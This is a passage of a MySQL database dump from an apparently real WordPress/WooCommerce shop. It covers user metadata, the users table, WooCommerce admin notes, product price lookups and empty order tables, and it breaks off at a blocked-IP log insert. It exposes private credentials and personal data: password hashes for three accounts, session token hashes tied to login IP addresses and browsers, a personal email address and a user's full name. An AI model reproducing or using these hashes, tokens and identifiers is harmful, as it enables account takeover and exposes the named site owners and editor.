2:\"postimagediv\";}'),(54,1,'metaboxhidden_page','a:0:{}'),(75,2,'locale',''),(76,2,'wpvt_capabilities','a:1:{s:13:\"administrator\";b:1;}'),(77,2,'wpvt_user_level','10'),(78,2,'dismissed_wp_pointers',''),(80,2,'wc_last_active','1599609600'),(83,2,'community-events-location','a:1:{s:2:\"ip\";s:12:\"37.111.129.0\";}'),(82,2,'wpvt_dashboard_quick_press_last_post_id','5427'),(128,1,'session_tokens','a:2:{s:64:\"e6d5e8a5a67a8557e60a34709de670624aed0ff8b5e3a2b20ad7d2cedbc767f4\";a:4:{s:10:\"expiration\";i:1697622733;s:2:\"ip\";s:14:\"94.205.102.155\";s:2:\"ua\";s:117:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.4 Safari/605.1.15\";s:5:\"login\";i:1697449933;}s:64:\"3d36be1334e16045fd1a9621673752ce318e7b9cfc92f51dd8795c8997912e0c\";a:4:{s:10:\"expiration\";i:1698779573;s:2:\"ip\";s:14:\"213.226.141.77\";s:2:\"ua\";s:111:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36\";s:5:\"login\";i:1697569973;}}'),(157,1,'wfls_notices','a:0:{}'),(123,1,'wpvt_persisted_preferences','a:3:{s:14:\"core/edit-post\";a:3:{s:26:\"isComplementaryAreaVisible\";b:1;s:12:\"welcomeGuide\";b:0;s:10:\"openPanels\";a:4:{i:0;s:11:\"post-status\";i:1;s:23:\"taxonomy-panel-category\";i:2;s:23:\"taxonomy-panel-post_tag\";i:3;s:14:\"featured-image\";}}s:9:\"_modified\";s:24:\"2023-10-10T08:13:47.800Z\";s:17:\"core/edit-widgets\";a:2:{s:26:\"isComplementaryAreaVisible\";b:1;s:12:\"welcomeGuide\";b:0;}}'),(129,3,'nickname','Bibbi'),(130,3,'first_name','Biljana'),(131,3,'last_name','Toft'),(132,3,'description',''),(133,3,'rich_editing','true'),(135,3,'comment_shortcuts','false'),(91,1,'_new_email','a:2:{s:4:\"hash\";s:32:\"1324371cacf64c8fb6b887836cbdb6d6\";s:8:\"newemail\";s:35:\"sara.chadwick@tummyrevolution.co.uk\";}'),(92,1,'billing_first_name',''),(93,1,'billing_last_name',''),(94,1,'billing_company',''),(95,1,'billing_address_1',''),(96,1,'billing_address_2',''),(97,1,'billing_city',''),(98,1,'billing_postcode',''),(99,1,'billing_country',''),(100,1,'billing_state',''),(101,1,'billing_phone',''),(102,1,'billing_email','admin@tummyrevolution.co.uk'),(103,1,'shipping_first_name',''),(104,1,'shipping_last_name',''),(105,1,'shipping_company',''),(106,1,'shipping_address_1',''),(107,1,'shipping_address_2',''),(108,1,'shipping_city',''),(109,1,'shipping_postcode',''),(110,1,'shipping_country',''),(111,1,'shipping_state',''),(112,1,'facebook',''),(113,1,'twitter',''),(114,1,'linkedin',''),(115,1,'instagram',''),(116,1,'pinterest',''),(117,1,'tumblr',''),(118,1,'googleplus',''),(119,1,'last_update','1692698155'),(126,1,'wfls-last-login','1697569974'),(134,3,'syntax_highlighting','true'),(136,3,'admin_color','fresh'),(137,3,'use_ssl','0'),(138,3,'show_admin_bar_front','true'),(139,3,'locale',''),(140,3,'wpvt_capabilities','a:1:{s:6:\"editor\";b:1;}'),(141,3,'wpvt_user_level','7'),(142,3,'dismissed_wp_pointers',''),(143,3,'facebook',''),(144,3,'twitter',''),(145,3,'linkedin',''),(146,3,'instagram',''),(147,3,'pinterest',''),(148,3,'tumblr',''),(149,3,'googleplus',''),(150,3,'session_tokens','a:1:{s:64:\"063271259220f3e900953cc11895f8b2298fadc296a30b25295a2872e818efa5\";a:4:{s:10:\"expiration\";i:1697188844;s:2:\"ip\";s:11:\"2.51.115.51\";s:2:\"ua\";s:117:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.4 Safari/605.1.15\";s:5:\"login\";i:1697016044;}}'),(151,3,'wfls-last-login','1697016044'),(152,3,'wpvt_dashboard_quick_press_last_post_id','5771'),(153,3,'community-events-location','a:1:{s:2:\"ip\";s:10:\"2.51.116.0\";}'),(154,3,'wpvt_persisted_preferences','a:2:{s:14:\"core/edit-post\";a:3:{s:26:\"isComplementaryAreaVisible\";b:1;s:12:\"welcomeGuide\";b:0;s:10:\"openPanels\";a:4:{i:0;s:11:\"post-status\";i:1;s:23:\"taxonomy-panel-post_tag\";i:2;s:14:\"featured-image\";i:3;s:23:\"taxonomy-panel-category\";}}s:9:\"_modified\";s:24:\"2023-09-12T13:57:22.981Z\";}'),(155,3,'wpvt_user-settings','libraryContent=browse&hidetb=1&mfold=f'),(156,3,'wpvt_user-settings-time','1696354468'),(158,3,'closedpostboxes_post','a:0:{}'),(159,3,'metaboxhidden_post','a:0:{}'); /*!40000 ALTER TABLE `wpvt_usermeta` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wpvt_users` -- DROP TABLE IF EXISTS `wpvt_users`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `wpvt_users` ( `ID` bigint(20) unsigned NOT NULL AUTO_INCREMENT, `user_login` varchar(60) NOT NULL DEFAULT '', `user_pass` varchar(255) NOT NULL DEFAULT '', `user_nicename` varchar(50) NOT NULL DEFAULT '', `user_email` varchar(100) NOT NULL DEFAULT '', `user_url` varchar(100) NOT NULL DEFAULT '', `user_registered` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `user_activation_key` varchar(255) NOT NULL DEFAULT '', `user_status` int(11) NOT NULL DEFAULT 0, `display_name` varchar(250) NOT NULL DEFAULT '', PRIMARY KEY (`ID`), KEY `user_login_key` (`user_login`), KEY `user_nicename` (`user_nicename`), KEY `user_email` (`user_email`) ) ENGINE=MyISAM AUTO_INCREMENT=4 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `wpvt_users` -- LOCK TABLES `wpvt_users` WRITE; /*!40000 ALTER TABLE `wpvt_users` DISABLE KEYS */; INSERT INTO `wpvt_users` (`ID`, `user_login`, `user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `user_status`, `display_name`) VALUES (1,'admin','$P$Bvr/jsEN35dGAFJkxy/MGgPsjoMBKw/','admin','admin@tummyrevolution.co.uk','','2020-03-30 20:59:10','',0,'Mini Gut Guru'),(2,'Sara','$P$BDXi4dPnWttK1RRQeq9rigAcNiNSum.','sara','admin@tumyrevolution.com','http://tummyrevolution.com','2020-09-09 22:03:41','',0,'Sara Food'),(3,'Bibbi','$P$BPyqJ0otKNjl2wNO1WTh7zlPJ3oU2B.','bibbi','bibbi72@hotmail.com','','2023-09-12 09:21:35','',0,'Biljana Toft'); /*!40000 ALTER TABLE `wpvt_users` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wpvt_wc_admin_note_actions` -- DROP TABLE IF EXISTS `wpvt_wc_admin_note_actions`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `wpvt_wc_admin_note_actions` ( `action_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT, `note_id` bigint(20) unsigned NOT NULL, `name` varchar(255) NOT NULL, `label` varchar(255) NOT NULL, `query` longtext NOT NULL, `status` varchar(255) NOT NULL, `is_primary` tinyint(1) NOT NULL DEFAULT 0, PRIMARY KEY (`action_id`), KEY `note_id` (`note_id`) ) ENGINE=MyISAM AUTO_INCREMENT=19 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `wpvt_wc_admin_note_actions` -- LOCK TABLES `wpvt_wc_admin_note_actions` WRITE; /*!40000 ALTER TABLE `wpvt_wc_admin_note_actions` DISABLE KEYS */; INSERT INTO `wpvt_wc_admin_note_actions` (`action_id`, `note_id`, `name`, `label`, `query`, `status`, `is_primary`) VALUES (1,1,'learn-more','Learn more','https://woocommerce.wordpress.com/','actioned',0),(2,2,'open-customizer','Open Customizer','customize.php','actioned',0),(3,3,'add-a-product','Add a product','http://tummyrevolution.com/wp-admin/post-new.php?post_type=product','actioned',1),(4,4,'connect','Connect','?page=wc-addons§ion=helper','actioned',0),(5,5,'learn-more','Learn more','https://woocommerce.com/mobile/','actioned',0),(6,6,'share-feedback','Review','https://wordpress.org/support/plugin/woocommerce-admin/reviews/?rate=5#new-post','actioned',0),(7,7,'learn-more','Learn more','https://woocommerce.com/products/facebook/','unactioned',0),(8,7,'install-now','Install now','','unactioned',1),(9,8,'tracking-dismiss','Dismiss','','actioned',0),(10,8,'tracking-opt-in','Activate usage tracking','','actioned',1),(11,9,'yes-please','Yes please!','https://woocommerce.us8.list-manage.com/subscribe/post?u=2c1434dc56f9506bf3c3ecd21&id=13860df971&SIGNUPPAGE=plugin','actioned',0),(18,10,'update-db_done','Thanks!','https://tummyrevolution.com/wp-admin/admin.php?page=wc-settings&wc-hide-notice=update&_wc_notice_nonce=6ace63576b','actioned',1); /*!40000 ALTER TABLE `wpvt_wc_admin_note_actions` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wpvt_wc_admin_notes` -- DROP TABLE IF EXISTS `wpvt_wc_admin_notes`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `wpvt_wc_admin_notes` ( `note_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT, `name` varchar(255) NOT NULL, `type` varchar(20) NOT NULL, `locale` varchar(20) NOT NULL, `title` longtext NOT NULL, `content` longtext NOT NULL, `icon` varchar(200) NOT NULL, `content_data` longtext DEFAULT NULL, `status` varchar(200) NOT NULL, `source` varchar(200) NOT NULL, `date_created` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `date_reminder` datetime DEFAULT NULL, `is_snoozable` tinyint(1) NOT NULL DEFAULT 0, PRIMARY KEY (`note_id`) ) ENGINE=MyISAM AUTO_INCREMENT=11 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `wpvt_wc_admin_notes` -- LOCK TABLES `wpvt_wc_admin_notes` WRITE; /*!40000 ALTER TABLE `wpvt_wc_admin_notes` DISABLE KEYS */; INSERT INTO `wpvt_wc_admin_notes` (`note_id`, `name`, `type`, `locale`, `title`, `content`, `icon`, `content_data`, `status`, `source`, `date_created`, `date_reminder`, `is_snoozable`) VALUES (1,'wc-admin-welcome-note','info','en_US','New feature(s)','Welcome to the new WooCommerce experience! In this new release you\'ll be able to have a glimpse of how your store is doing in the Dashboard, manage important aspects of your business (such as managing orders, stock, reviews) from anywhere in the interface, dive into your store data with a completely new Analytics section and more!','info','{}','unactioned','woocommerce-admin','2020-03-30 21:12:14',NULL,0),(2,'wc-admin-store-notice-setting-moved','info','en_US','Looking for the Store Notice setting?','It can now be found in the Customizer.','info','{}','unactioned','woocommerce-admin','2020-03-30 21:12:14',NULL,0),(3,'wc-admin-add-first-product','info','en_US','Add your first product','Grow your revenue by adding products to your store. Add products manually, import from a sheet, or migrate from another platform.','product','{}','unactioned','woocommerce-admin','2020-03-30 21:12:15',NULL,0),(4,'wc-admin-wc-helper-connection','info','en_US','Connect to WooCommerce.com','Connect to get important product notifications and updates.','info','{}','unactioned','woocommerce-admin','2020-03-30 21:12:15',NULL,0),(5,'wc-admin-mobile-app','info','en_US','Install Woo mobile app','Install the WooCommerce mobile app to manage orders, receive sales notifications, and view key metrics — wherever you are.','phone','{}','unactioned','woocommerce-admin','2020-04-02 06:30:17',NULL,0),(6,'wc-admin-store-notice-giving-feedback','info','en_US','Review your experience','If you like WooCommerce Admin please leave us a 5 star rating. A huge thanks in advance!','info','{}','unactioned','woocommerce-admin','2020-04-02 22:28:58',NULL,0),(7,'wc-admin-facebook-extension','info','en_US','Market on Facebook','Grow your business by targeting the right people and driving sales with Facebook. You can install this free extension now.','thumbs-up','{}','unactioned','woocommerce-admin','2020-04-02 22:28:58',NULL,0),(8,'wc-admin-usage-tracking-opt-in','info','en_US','Help WooCommerce improve with usage tracking','Gathering usage data allows us to improve WooCommerce. Your store will be considered as we evaluate new features, judge the quality of an update, or determine if an improvement makes sense. You can always visit the Settings and choose to stop sharing data. Read more about what data we collect.','info','{}','unactioned','woocommerce-admin','2020-04-06 22:15:37',NULL,0),(9,'wc-admin-onboarding-email-marketing','info','en_US','Tips, product updates, and inspiration','We\'re here for you — get tips, product updates, and inspiration straight to your mailbox.','mail','{}','unactioned','woocommerce-admin','2021-07-15 21:12:34',NULL,0),(10,'wc-update-db-reminder','update','en_US','WooCommerce database update done','WooCommerce database update complete. Thank you for updating to the latest version!','info','{}','unactioned','woocommerce-core','2023-08-01 09:23:36',NULL,0); /*!40000 ALTER TABLE `wpvt_wc_admin_notes` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wpvt_wc_category_lookup` -- DROP TABLE IF EXISTS `wpvt_wc_category_lookup`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `wpvt_wc_category_lookup` ( `category_tree_id` bigint(20) unsigned NOT NULL, `category_id` bigint(20) unsigned NOT NULL, PRIMARY KEY (`category_tree_id`,`category_id`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `wpvt_wc_category_lookup` -- LOCK TABLES `wpvt_wc_category_lookup` WRITE; /*!40000 ALTER TABLE `wpvt_wc_category_lookup` DISABLE KEYS */; INSERT INTO `wpvt_wc_category_lookup` (`category_tree_id`, `category_id`) VALUES (15,15),(46,46),(47,47),(48,48),(49,49),(50,50); /*!40000 ALTER TABLE `wpvt_wc_category_lookup` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wpvt_wc_customer_lookup` -- DROP TABLE IF EXISTS `wpvt_wc_customer_lookup`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `wpvt_wc_customer_lookup` ( `customer_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT, `user_id` bigint(20) unsigned DEFAULT NULL, `username` varchar(60) NOT NULL DEFAULT '', `first_name` varchar(255) NOT NULL, `last_name` varchar(255) NOT NULL, `email` varchar(100) DEFAULT NULL, `date_last_active` timestamp NULL DEFAULT NULL, `date_registered` timestamp NULL DEFAULT NULL, `country` char(2) NOT NULL DEFAULT '', `postcode` varchar(20) NOT NULL DEFAULT '', `city` varchar(100) NOT NULL DEFAULT '', `state` varchar(100) NOT NULL DEFAULT '', PRIMARY KEY (`customer_id`), UNIQUE KEY `user_id` (`user_id`), KEY `email` (`email`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `wpvt_wc_customer_lookup` -- LOCK TABLES `wpvt_wc_customer_lookup` WRITE; /*!40000 ALTER TABLE `wpvt_wc_customer_lookup` DISABLE KEYS */; /*!40000 ALTER TABLE `wpvt_wc_customer_lookup` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wpvt_wc_download_log` -- DROP TABLE IF EXISTS `wpvt_wc_download_log`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `wpvt_wc_download_log` ( `download_log_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT, `timestamp` datetime NOT NULL, `permission_id` bigint(20) unsigned NOT NULL, `user_id` bigint(20) unsigned DEFAULT NULL, `user_ip_address` varchar(100) DEFAULT '', PRIMARY KEY (`download_log_id`), KEY `permission_id` (`permission_id`), KEY `timestamp` (`timestamp`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `wpvt_wc_download_log` -- LOCK TABLES `wpvt_wc_download_log` WRITE; /*!40000 ALTER TABLE `wpvt_wc_download_log` DISABLE KEYS */; /*!40000 ALTER TABLE `wpvt_wc_download_log` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wpvt_wc_order_coupon_lookup` -- DROP TABLE IF EXISTS `wpvt_wc_order_coupon_lookup`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `wpvt_wc_order_coupon_lookup` ( `order_id` bigint(20) unsigned NOT NULL, `coupon_id` bigint(20) unsigned NOT NULL, `date_created` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `discount_amount` double NOT NULL DEFAULT 0, PRIMARY KEY (`order_id`,`coupon_id`), KEY `coupon_id` (`coupon_id`), KEY `date_created` (`date_created`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `wpvt_wc_order_coupon_lookup` -- LOCK TABLES `wpvt_wc_order_coupon_lookup` WRITE; /*!40000 ALTER TABLE `wpvt_wc_order_coupon_lookup` DISABLE KEYS */; /*!40000 ALTER TABLE `wpvt_wc_order_coupon_lookup` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wpvt_wc_order_product_lookup` -- DROP TABLE IF EXISTS `wpvt_wc_order_product_lookup`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `wpvt_wc_order_product_lookup` ( `order_item_id` bigint(20) unsigned NOT NULL, `order_id` bigint(20) unsigned NOT NULL, `product_id` bigint(20) unsigned NOT NULL, `variation_id` bigint(20) unsigned NOT NULL, `customer_id` bigint(20) unsigned DEFAULT NULL, `date_created` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `product_qty` int(11) NOT NULL, `product_net_revenue` double NOT NULL DEFAULT 0, `product_gross_revenue` double NOT NULL DEFAULT 0, `coupon_amount` double NOT NULL DEFAULT 0, `tax_amount` double NOT NULL DEFAULT 0, `shipping_amount` double NOT NULL DEFAULT 0, `shipping_tax_amount` double NOT NULL DEFAULT 0, PRIMARY KEY (`order_item_id`), KEY `order_id` (`order_id`), KEY `product_id` (`product_id`), KEY `customer_id` (`customer_id`), KEY `date_created` (`date_created`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `wpvt_wc_order_product_lookup` -- LOCK TABLES `wpvt_wc_order_product_lookup` WRITE; /*!40000 ALTER TABLE `wpvt_wc_order_product_lookup` DISABLE KEYS */; /*!40000 ALTER TABLE `wpvt_wc_order_product_lookup` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wpvt_wc_order_stats` -- DROP TABLE IF EXISTS `wpvt_wc_order_stats`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `wpvt_wc_order_stats` ( `order_id` bigint(20) unsigned NOT NULL, `parent_id` bigint(20) unsigned NOT NULL DEFAULT 0, `date_created` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `date_created_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `num_items_sold` int(11) NOT NULL DEFAULT 0, `total_sales` double NOT NULL DEFAULT 0, `tax_total` double NOT NULL DEFAULT 0, `shipping_total` double NOT NULL DEFAULT 0, `net_total` double NOT NULL DEFAULT 0, `returning_customer` tinyint(1) DEFAULT NULL, `status` varchar(200) NOT NULL, `customer_id` bigint(20) unsigned NOT NULL, PRIMARY KEY (`order_id`), KEY `date_created` (`date_created`), KEY `customer_id` (`customer_id`), KEY `status` (`status`(191)) ) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `wpvt_wc_order_stats` -- LOCK TABLES `wpvt_wc_order_stats` WRITE; /*!40000 ALTER TABLE `wpvt_wc_order_stats` DISABLE KEYS */; /*!40000 ALTER TABLE `wpvt_wc_order_stats` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wpvt_wc_order_tax_lookup` -- DROP TABLE IF EXISTS `wpvt_wc_order_tax_lookup`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `wpvt_wc_order_tax_lookup` ( `order_id` bigint(20) unsigned NOT NULL, `tax_rate_id` bigint(20) unsigned NOT NULL, `date_created` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `shipping_tax` double NOT NULL DEFAULT 0, `order_tax` double NOT NULL DEFAULT 0, `total_tax` double NOT NULL DEFAULT 0, PRIMARY KEY (`order_id`,`tax_rate_id`), KEY `tax_rate_id` (`tax_rate_id`), KEY `date_created` (`date_created`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `wpvt_wc_order_tax_lookup` -- LOCK TABLES `wpvt_wc_order_tax_lookup` WRITE; /*!40000 ALTER TABLE `wpvt_wc_order_tax_lookup` DISABLE KEYS */; /*!40000 ALTER TABLE `wpvt_wc_order_tax_lookup` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wpvt_wc_product_meta_lookup` -- DROP TABLE IF EXISTS `wpvt_wc_product_meta_lookup`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `wpvt_wc_product_meta_lookup` ( `product_id` bigint(20) NOT NULL, `sku` varchar(100) DEFAULT '', `virtual` tinyint(1) DEFAULT 0, `downloadable` tinyint(1) DEFAULT 0, `min_price` decimal(19,4) DEFAULT NULL, `max_price` decimal(19,4) DEFAULT NULL, `onsale` tinyint(1) DEFAULT 0, `stock_quantity` double DEFAULT NULL, `stock_status` varchar(100) DEFAULT 'instock', `rating_count` bigint(20) DEFAULT 0, `average_rating` decimal(3,2) DEFAULT 0.00, `total_sales` bigint(20) DEFAULT 0, `tax_status` varchar(100) DEFAULT 'taxable', `tax_class` varchar(100) DEFAULT '', PRIMARY KEY (`product_id`), KEY `virtual` (`virtual`), KEY `downloadable` (`downloadable`), KEY `stock_status` (`stock_status`), KEY `stock_quantity` (`stock_quantity`), KEY `onsale` (`onsale`), KEY `min_max_price` (`min_price`,`max_price`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `wpvt_wc_product_meta_lookup` -- LOCK TABLES `wpvt_wc_product_meta_lookup` WRITE; /*!40000 ALTER TABLE `wpvt_wc_product_meta_lookup` DISABLE KEYS */; INSERT INTO `wpvt_wc_product_meta_lookup` (`product_id`, `sku`, `virtual`, `downloadable`, `min_price`, `max_price`, `onsale`, `stock_quantity`, `stock_status`, `rating_count`, `average_rating`, `total_sales`, `tax_status`, `tax_class`) VALUES (1098,'05',0,0,110.0000,110.0000,0,NULL,'instock',0,0.00,0,'taxable',''),(1110,'16',0,0,79.0000,79.0000,0,NULL,'instock',0,0.00,0,'taxable',''),(1107,'13',0,0,84.0000,84.0000,0,NULL,'instock',0,0.00,0,'taxable',''),(1106,'12',0,0,77.0000,77.0000,0,NULL,'instock',0,0.00,0,'taxable',''),(1105,'11',0,0,67.0000,67.0000,0,NULL,'instock',0,0.00,0,'taxable',''),(1103,'09',0,0,95.0000,95.0000,0,NULL,'instock',0,0.00,0,'taxable',''),(1102,'08',0,0,116.0000,116.0000,0,NULL,'instock',0,0.00,0,'taxable',''),(1100,'07',0,0,101.0000,101.0000,0,NULL,'instock',0,0.00,0,'taxable',''),(1099,'06',0,0,92.0000,92.0000,0,NULL,'instock',0,0.00,0,'taxable',''),(1096,'03',0,0,106.0000,106.0000,0,NULL,'instock',0,0.00,0,'taxable',''),(1095,'02',0,0,98.0000,98.0000,0,NULL,'instock',0,0.00,0,'taxable',''),(1104,'10',0,0,99.0000,99.0000,0,NULL,'instock',0,0.00,0,'taxable',''),(1109,'15',0,0,93.0000,93.0000,0,NULL,'instock',0,0.00,0,'taxable',''),(1108,'14',0,0,80.0000,80.0000,0,NULL,'instock',0,0.00,0,'taxable',''),(1097,'04',0,0,86.0000,86.0000,0,NULL,'instock',0,0.00,0,'taxable',''),(1080,'01',0,0,79.0000,79.0000,0,NULL,'instock',0,0.00,0,'taxable',''); /*!40000 ALTER TABLE `wpvt_wc_product_meta_lookup` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wpvt_wc_tax_rate_classes` -- DROP TABLE IF EXISTS `wpvt_wc_tax_rate_classes`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `wpvt_wc_tax_rate_classes` ( `tax_rate_class_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT, `name` varchar(200) NOT NULL DEFAULT '', `slug` varchar(200) NOT NULL DEFAULT '', PRIMARY KEY (`tax_rate_class_id`), UNIQUE KEY `slug` (`slug`(191)) ) ENGINE=MyISAM AUTO_INCREMENT=3 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `wpvt_wc_tax_rate_classes` -- LOCK TABLES `wpvt_wc_tax_rate_classes` WRITE; /*!40000 ALTER TABLE `wpvt_wc_tax_rate_classes` DISABLE KEYS */; INSERT INTO `wpvt_wc_tax_rate_classes` (`tax_rate_class_id`, `name`, `slug`) VALUES (1,'Reduced rate','reduced-rate'),(2,'Zero rate','zero-rate'); /*!40000 ALTER TABLE `wpvt_wc_tax_rate_classes` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wpvt_wc_webhooks` -- DROP TABLE IF EXISTS `wpvt_wc_webhooks`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `wpvt_wc_webhooks` ( `webhook_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT, `status` varchar(200) NOT NULL, `name` text NOT NULL, `user_id` bigint(20) unsigned NOT NULL, `delivery_url` text NOT NULL, `secret` text NOT NULL, `topic` varchar(200) NOT NULL, `date_created` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `date_created_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `date_modified` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `date_modified_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `api_version` smallint(4) NOT NULL, `failure_count` smallint(10) NOT NULL DEFAULT 0, `pending_delivery` tinyint(1) NOT NULL DEFAULT 0, PRIMARY KEY (`webhook_id`), KEY `user_id` (`user_id`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `wpvt_wc_webhooks` -- LOCK TABLES `wpvt_wc_webhooks` WRITE; /*!40000 ALTER TABLE `wpvt_wc_webhooks` DISABLE KEYS */; /*!40000 ALTER TABLE `wpvt_wc_webhooks` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wpvt_wfblockediplog` -- DROP TABLE IF EXISTS `wpvt_wfblockediplog`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `wpvt_wfblockediplog` ( `IP` binary(16) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', `countryCode` varchar(2) NOT NULL, `blockCount` int(10) unsigned NOT NULL DEFAULT 0, `unixday` int(10) unsigned NOT NULL, `blockType` varchar(50) NOT NULL DEFAULT 'generic', PRIMARY KEY (`IP`,`unixday`,`blockType`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8mb3 COLLATE=utf8mb3_general_ci; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `wpvt_wfblockediplog` -- LOCK TABLES `wpvt_wfblockediplog` WRITE; /*!40000 ALTER TABLE `wpvt_wfblockediplog` DISABLE KEYS */; INSERT INTO `wpvt_wfblockediplog` (`IP`, `countryCode`, `blockCount`, `unixday`, `blockType`) VALUES 